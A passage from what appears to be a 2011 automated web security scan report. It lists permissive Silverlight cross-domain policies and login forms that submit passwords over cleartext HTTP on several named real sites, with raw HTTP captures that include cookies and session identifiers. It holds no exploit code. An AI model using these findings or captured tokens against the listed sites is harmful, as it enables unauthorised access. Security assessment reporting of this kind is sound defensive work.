               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
5.7. http://secure-us.imrworldwide.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:13:55 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Tue, 21 Jun 2011 00:13:55 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...
5.8. http://spd.pointroll.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spd.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spd.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:133a"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 14 Jun 2011 00:19:16 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...
5.9. http://spe.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Expires: Wed, 15 Jun 2011 10:33:28 GMT
Date: Mon, 13 Jun 2011 17:46:12 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
5.10. http://speed.pointroll.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:19:17 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...
5.11. http://stats.wordpress.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 17:45:16 GMT
Content-Type: text/xml
Connection: close
Content-Length: 309
Last-Modified: Wed, 01 Sep 2010 15:30:22 GMT
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...
5.12. http://viamtv.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: viamtv.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 17:45:09 GMT
Server: Omniture DC/2.0.0
xserver: www179
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
5.13. http://windows.microsoft.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://windows.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: windows.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 492
Content-Type: text/xml
Expires: Wed, 15 Jun 2011 00:34:12 GMT
ETag: 1SLHTAjNm9LZrdKgMcT2MAXI3ANRN6JUyM+SrrTXpwk=
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-UA-Compatible: IE=9
Date: Tue, 14 Jun 2011 00:34:11 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">

<domain uri="http://windows.microsoft.com"/
...[SNIP]...
<domain uri="http://*.windows.microsoft.com"/><domain uri="http://explore.live.com"/><domain uri="http://*.explore.live.com"/>
...[SNIP]...
5.14. http://js.microsoft.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: js.microsoft.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 438588200300000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Cache-Control: max-age=900
Date: Tue, 14 Jun 2011 00:34:27 GMT
Content-Length: 572
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="http://www.microsoft.com"/>
<domain uri="http://i.microsoft.com"/>
<domain uri="http://i2.microsoft.com"/>
<domain uri="http://i3.microsoft.com"/>
<domain uri="http://i4.microsoft.com"/>
   <domain uri="http://img.microsoft.com"/>
...[SNIP]...
5.15. http://www.microsoft.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
Accept-Ranges: bytes
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 279472432300000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:34:08 GMT
Connection: keep-alive
Content-Length: 572

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="http://www.microsoft.com"/>
<domain uri="http://i.microsoft.com"/>
<domain uri="http://i2.microsoft.com"/>
<domain uri="http://i3.microsoft.com"/>
<domain uri="http://i4.microsoft.com"/>
   <domain uri="http://img.microsoft.com"/>
...[SNIP]...
6. Cleartext submission of password  previous  next
There are 10 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

6.1. http://community.mtv.com/Overlays/LogIn.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.mtv.com
Path:   /Overlays/LogIn.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com HTTP/1.1
Host: community.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D; MTV_ID=209.18.38.165.1308010776270; s_ppv=65

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Server: w02w
App: ww
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
Cteonnt-Length: 23669
Content-Length: 23669
Date: Tue, 14 Jun 2011 00:27:49 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: IsMasterAuthResponse=false; expires=Mon, 25-Aug-2008 19:01:02 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div class="fluxPageContainer">
       <form name="aspnetForm" method="post" action="LogIn.aspx?callbackName=F13080112111260&amp;fluxHosted=false&amp;fbAutoLoginDisabled=true&amp;domain=www.mtv.com" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
</label><input name="ctl00$ctl00$phBody$phBody$cLogin$tbPassword" type="password" id="ctl00_ctl00_phBody_phBody_cLogin_tbPassword" class="inputText" /><span id="ctl00_ctl00_phBody_phBody_cLogin_ctl03" relativeControl="trPassword" style="color:Red;display:none;">
...[SNIP]...
6.2. http://en.gravatar.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.gravatar.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:30:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:30:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 9877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
</h4>
   <form action="/sessions/emails%252F" method="post">
       <p>
...[SNIP]...
</label>
           <input type="password" class="text" id="account_password" name="pass" />
       </p>
...[SNIP]...
6.3. http://en.gravatar.com/site/login/%252F  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.gravatar.com
Path:   /site/login/%252F

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /site/login/%252F HTTP/1.1
Host: en.gravatar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=236484949.1308011412.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-894869797-1308011414185; __utma=236484949.232928841.1308011412.1308011412.1308011412.1; __utmc=236484949; __utmb=236484949.2.10.1308011412

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:33:22 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
P3P: CP="CAO PSA"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:33:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 6237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
</p>

                   <form method="post" action="/sessions/">
                       <p>
...[SNIP]...
</label>
                           <input type="password" size="30" name="pass" id="account_password" class="text"/>
                       </p>
...[SNIP]...
6.4. http://members.pega.com/login.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://members.pega.com
Path:   /login.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login.asp HTTP/1.1
Host: members.pega.com
Proxy-Connection: keep-alive
Referer: http://members.pega.com/cookiecheck.asp?pcd=/login.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94242332.1308054477.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); DestinationURL=http%3A%2F%2Fwww.pega.com%2Fuser; RedirectFunction=login; ASPSESSIONIDSQBDSBTB=AMBIJDIDLIMGJAPGNGCFEOGB; __utma=94242332.1196155334.1308054477.1308054477.1308054477.1; __utmc=94242332; __utmv=94242332.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=94242332.8.10.1308054477; __utmz=87550468.1308054615.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87550468.1252779431.1308054615.1308054615.1308054615.1; __utmc=87550468; __utmb=87550468.1.10.1308054615; test_cookie=cookie_value; nocheck=1

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Expires: Tue, 14 Jun 2011 12:35:52 GMT
Date: Tue, 14 Jun 2011 12:36:52 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
Pragma: no-cache
Set-Cookie: pega%5Fautolog=000; expires=Wed, 13-Jun-2012 04:00:00 GMT; path=/
Cache-control: no-cache
Vary: Accept-Encoding
Content-Length: 35546


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
<div style="text-align: left; border: solid 1px #CCCCCC; width: 95%; height: 500px; margin: 20px 0px 20px 0px; padding: 0px 10px 0px 10px;">
                       <form action="" method="post" name="login_form" id="login_form" onsubmit="return validateFields(this);" autocomplete="off">
                           <input name="submitted" type="hidden" id="submitted" value="1" />
...[SNIP]...
<td width="713"><input type="password" name="password_display" id="password_display" class="input_field" size="35" maxlength="25" />
                                       <input name="password" id="password" type="hidden" />
...[SNIP]...
6.5. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052702304665904576383880754844512.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; __utmz=1.1305367794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1748330365.1305367794.1305373038.1306496231.3; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D1; s_cc=true; _chartbeat2=wh4hk9xmdxztvs8m; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001; DJSESSION=continent%3Dna%7C%7Czip%3D20001-20020%7C%7Ccountry%3Dus%7C%7Cregion%3Ddc%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dwashington%7C%7Clongitude%3D-77.0369%7C%7Ctimezone%3Dest%7C%7Clatitude%3D38.8951%7C%7CBIZO%3Dbiz%3D1080%3Bbiz%3D1027%3Bbiz%3D1053%3B; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2273%22%5D%2C%22low%22%3A%5B%2259%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DTue%2C%2014%20Jun%202011%2000%3A33%3A55%20GMT%7C%7CweatherCode%3D10005; s_invisit=true; s_sq=djglobal%2Cdjwsj%3D%2526pid%253DWSJ_Tech_0_0_WP_2200%2526pidt%253D1%2526oid%253Dhttp%25253A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%25253Fmod%25253DWSJ_Tech_LEADTop%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:14:01 GMT
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep06 - Mon 06/13/11 - 18:23:34 EDT
Cache-Control: max-age=15
Expires: Tue, 14 Jun 2011 00:14:16 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 134684
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</h4>
<form action="http://commerce.wsj.com/auth/submitlogin" id="login_form" name="login_form" method="post" onsubmit="suppress_popup=true;return true;">
<fieldset>
...[SNIP]...
</label>
<input type="password" name="password" id="login_password" class="login_pswd" tabindex="2" value="" maxlength="30"/>
<input type="hidden" name="url" id="page_url" value=""/>
...[SNIP]...
6.6. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052702304665904576383880754844512.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; __utmz=1.1305367794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1748330365.1305367794.1305373038.1306496231.3; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D1; s_cc=true; _chartbeat2=wh4hk9xmdxztvs8m; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001; DJSESSION=continent%3Dna%7C%7Czip%3D20001-20020%7C%7Ccountry%3Dus%7C%7Cregion%3Ddc%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dwashington%7C%7Clongitude%3D-77.0369%7C%7Ctimezone%3Dest%7C%7Clatitude%3D38.8951%7C%7CBIZO%3Dbiz%3D1080%3Bbiz%3D1027%3Bbiz%3D1053%3B; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2273%22%5D%2C%22low%22%3A%5B%2259%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DTue%2C%2014%20Jun%202011%2000%3A33%3A55%20GMT%7C%7CweatherCode%3D10005; s_invisit=true; s_sq=djglobal%2Cdjwsj%3D%2526pid%253DWSJ_Tech_0_0_WP_2200%2526pidt%253D1%2526oid%253Dhttp%25253A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%25253Fmod%25253DWSJ_Tech_LEADTop%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:14:01 GMT
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep06 - Mon 06/13/11 - 18:23:34 EDT
Cache-Control: max-age=15
Expires: Tue, 14 Jun 2011 00:14:16 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 134684
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<form name="freeRegistration_form" id="freeRegistration_form" action="" method="post" accept-charset="utf-8" onsubmit="return false;">
<ul class="regForms">
...[SNIP]...
</label>
<input type="password" name="passwordReg" value="" id="passwordReg" maxlength='15' class="text" />
</div>
...[SNIP]...
</label>

<input type="password" name="passwordConfirmationReg" value="" id="passwordConfirmationReg" maxlength='15' class="text" />
</div>
...[SNIP]...
6.7. http://www.livewithoscar.com/Calendar.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /Calendar.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Calendar.aspx HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/DailyOmni.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.4.10.1308052841

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:01:56 GMT
Content-Length: 20681

<!-- All visible symbols and logos are Trademarks and Copyrights of LiveWithOscar.com ..TM 2006 - 2010 All Rights Reserved. -->
<!-- Site design, development databases and all supporting scripts are
...[SNIP]...
</script>
<form name="form2" method="post" action="Calendar.aspx" id="form2">
<div>
...[SNIP]...
<br /><input name="txtPassword" type="password" id="txtPassword" /><br />
...[SNIP]...
6.8. http://www.livewithoscar.com/Chat.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /Chat.aspx

Issue detail

